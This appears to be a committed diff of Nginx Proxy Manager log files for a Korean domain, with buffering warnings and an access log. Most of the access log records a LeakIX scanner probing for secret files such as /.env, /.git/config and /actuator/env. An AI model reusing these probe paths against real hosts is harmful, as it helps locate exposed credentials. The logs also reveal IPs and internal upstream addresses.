2026/02/15 01:10:26 [warn] 378#378: *603 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/00/0000000003 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
|
||||||
|
2026/02/15 01:11:14 [warn] 378#378: *603 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/00/0000000004 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
|
||||||
|
2026/02/15 01:14:43 [warn] 378#378: *630 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/00/0000000005 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
|
||||||
|
2026/02/15 01:17:46 [warn] 378#378: *641 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/00/0000000006 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
|
||||||
|
2026/02/15 01:18:21 [warn] 378#378: *641 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/00/0000000007 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
|
||||||
|
2026/02/15 01:18:51 [warn] 378#378: *641 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/00/0000000008 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
|
||||||
|
2026/02/15 02:06:56 [warn] 521#521: *4047 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/49/0000001495 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
|
||||||
413
npm/data/logs/proxy-host-2_access.log
Normal file
413
npm/data/logs/proxy-host-2_access.log
Normal file
@@ -0,0 +1,413 @@
|
|||||||
|
[14/Feb/2026:22:59:23 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
|
||||||
|
[14/Feb/2026:22:59:23 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/favicon.ico" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
|
||||||
|
[14/Feb/2026:22:59:49 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
|
||||||
|
[14/Feb/2026:22:59:49 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/favicon.ico" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
|
||||||
|
[14/Feb/2026:23:00:27 +0000] - - 301 - HEAD http asset.hanmocnn.co.kr "/" [Client 195.123.244.84] [Length 0] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0" "-"
|
||||||
|
[14/Feb/2026:23:00:28 +0000] - 502 502 - HEAD https asset.hanmocnn.co.kr "/" [Client 195.123.244.84] [Length 0] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0" "http://asset.hanmocnn.co.kr"
|
||||||
|
[14/Feb/2026:23:00:30 +0000] - - 400 - - https asset.hanmocnn.co.kr "-" [Client 128.199.182.55] [Length 154] [Gzip -] [Sent-to ] "-" "-"
|
||||||
|
[14/Feb/2026:23:00:30 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/" [Client 128.199.182.55] [Length 154] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:00:31 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/" [Client 147.182.200.94] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:00:31 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/server" [Client 128.199.182.55] [Length 154] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:00:32 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
|
||||||
|
[14/Feb/2026:23:00:32 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/favicon.ico" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
|
||||||
|
[14/Feb/2026:23:00:32 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/server" [Client 147.182.200.94] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:00:32 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/server-status" [Client 128.199.182.55] [Length 154] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:00:33 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/server-status" [Client 147.182.200.94] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:00:34 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/about" [Client 128.199.182.55] [Length 154] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:00:35 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/login.action" [Client 128.199.182.55] [Length 154] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:00:35 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/about" [Client 147.182.200.94] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:00:36 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/v2/_catalog" [Client 128.199.182.55] [Length 154] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:00:36 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/login.action" [Client 147.182.200.94] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:00:36 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/.DS_Store" [Client 128.199.182.55] [Length 154] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:00:37 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/v2/_catalog" [Client 147.182.200.94] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:00:37 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/.env" [Client 128.199.182.55] [Length 154] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:00:37 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/.DS_Store" [Client 147.182.200.94] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:00:38 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/.env" [Client 147.182.200.94] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:00:39 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 128.199.182.55] [Length 154] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:00:40 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 147.182.200.94] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:00:41 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/.git/config" [Client 128.199.182.55] [Length 154] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:00:42 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/.git/config" [Client 147.182.200.94] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:00:42 +0000] - 502 502 - POST https asset.hanmocnn.co.kr "/graphql" [Client 128.199.182.55] [Length 154] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:00:43 +0000] - 502 502 - POST https asset.hanmocnn.co.kr "/api" [Client 128.199.182.55] [Length 154] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:00:43 +0000] - 502 502 - POST https asset.hanmocnn.co.kr "/api/graphql" [Client 128.199.182.55] [Length 154] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:00:43 +0000] - 502 502 - POST https asset.hanmocnn.co.kr "/graphql/api" [Client 128.199.182.55] [Length 154] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:00:44 +0000] - 502 502 - POST https asset.hanmocnn.co.kr "/api/gql" [Client 128.199.182.55] [Length 154] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:00:44 +0000] - - 301 - POST http asset.hanmocnn.co.kr "/graphql" [Client 147.182.200.94] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:00:44 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/s/1353e21343e2731313e2232323/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties" [Client 128.199.182.55] [Length 154] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:00:44 +0000] - - 301 - POST http asset.hanmocnn.co.kr "/api" [Client 147.182.200.94] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:00:44 +0000] - - 301 - POST http asset.hanmocnn.co.kr "/api/graphql" [Client 147.182.200.94] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:00:44 +0000] - - 301 - POST http asset.hanmocnn.co.kr "/graphql/api" [Client 147.182.200.94] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:00:45 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/config.json" [Client 128.199.182.55] [Length 154] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:00:45 +0000] - - 301 - POST http asset.hanmocnn.co.kr "/api/gql" [Client 147.182.200.94] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:00:45 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/s/1353e21343e2731313e2232323/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties" [Client 147.182.200.94] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:00:46 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/config.json" [Client 147.182.200.94] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:00:47 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/telescope/requests" [Client 128.199.182.55] [Length 154] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:00:47 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/" [Client 205.169.39.45] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36" "-"
|
||||||
|
[14/Feb/2026:23:00:47 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/info.php" [Client 128.199.182.55] [Length 154] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:00:48 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/" [Client 34.123.170.104] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" "-"
|
||||||
|
[14/Feb/2026:23:00:48 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/telescope/requests" [Client 147.182.200.94] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:00:48 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/.well-known/security.txt" [Client 128.199.182.55] [Length 154] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:00:48 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/info.php" [Client 147.182.200.94] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:00:48 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/" [Client 34.72.176.129] [Length 556] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" "-"
|
||||||
|
[14/Feb/2026:23:00:49 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/actuator/env" [Client 128.199.182.55] [Length 154] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:00:49 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/.well-known/security.txt" [Client 147.182.200.94] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:00:50 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/actuator/env" [Client 147.182.200.94] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:00:51 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/swagger-ui.html" [Client 128.199.182.55] [Length 154] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:00:52 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/swagger/index.html" [Client 128.199.182.55] [Length 154] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:00:52 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/swagger-ui.html" [Client 147.182.200.94] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:00:53 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/swagger/swagger-ui.html" [Client 128.199.182.55] [Length 154] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:00:53 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/swagger/index.html" [Client 147.182.200.94] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:00:54 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/" [Client 205.169.39.45] [Length 556] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36" "-"
|
||||||
|
[14/Feb/2026:23:00:54 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/webjars/swagger-ui/index.html" [Client 128.199.182.55] [Length 154] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:00:54 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/swagger/swagger-ui.html" [Client 147.182.200.94] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:00:55 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/swagger.json" [Client 128.199.182.55] [Length 154] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:00:55 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/webjars/swagger-ui/index.html" [Client 147.182.200.94] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:00:56 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/swagger/v1/swagger.json" [Client 128.199.182.55] [Length 154] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:00:56 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/swagger.json" [Client 147.182.200.94] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:00:57 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/v2/api-docs" [Client 128.199.182.55] [Length 154] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:00:57 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/swagger/v1/swagger.json" [Client 147.182.200.94] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:00:58 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/v3/api-docs" [Client 128.199.182.55] [Length 154] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:00:58 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/v2/api-docs" [Client 147.182.200.94] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:00:59 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/api-docs/swagger.json" [Client 128.199.182.55] [Length 154] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:00:59 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/v3/api-docs" [Client 147.182.200.94] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:01:00 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/api/swagger.json" [Client 128.199.182.55] [Length 154] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:01:00 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/api-docs/swagger.json" [Client 147.182.200.94] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:01:01 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/@vite/env" [Client 128.199.182.55] [Length 154] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:01:01 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/api/swagger.json" [Client 147.182.200.94] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:01:02 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/.vscode/sftp.json" [Client 128.199.182.55] [Length 154] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:01:02 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/@vite/env" [Client 147.182.200.94] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:01:03 +0000] - 502 502 - OPTIONS https asset.hanmocnn.co.kr "/" [Client 128.199.182.55] [Length 154] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:01:03 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/.vscode/sftp.json" [Client 147.182.200.94] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:01:04 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/?rest_route=/wp/v2/users/" [Client 128.199.182.55] [Length 154] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:01:04 +0000] - - 301 - OPTIONS http asset.hanmocnn.co.kr "/" [Client 147.182.200.94] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:01:05 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/debug/default/view?panel=config" [Client 128.199.182.55] [Length 154] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:01:05 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/?rest_route=/wp/v2/users/" [Client 147.182.200.94] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
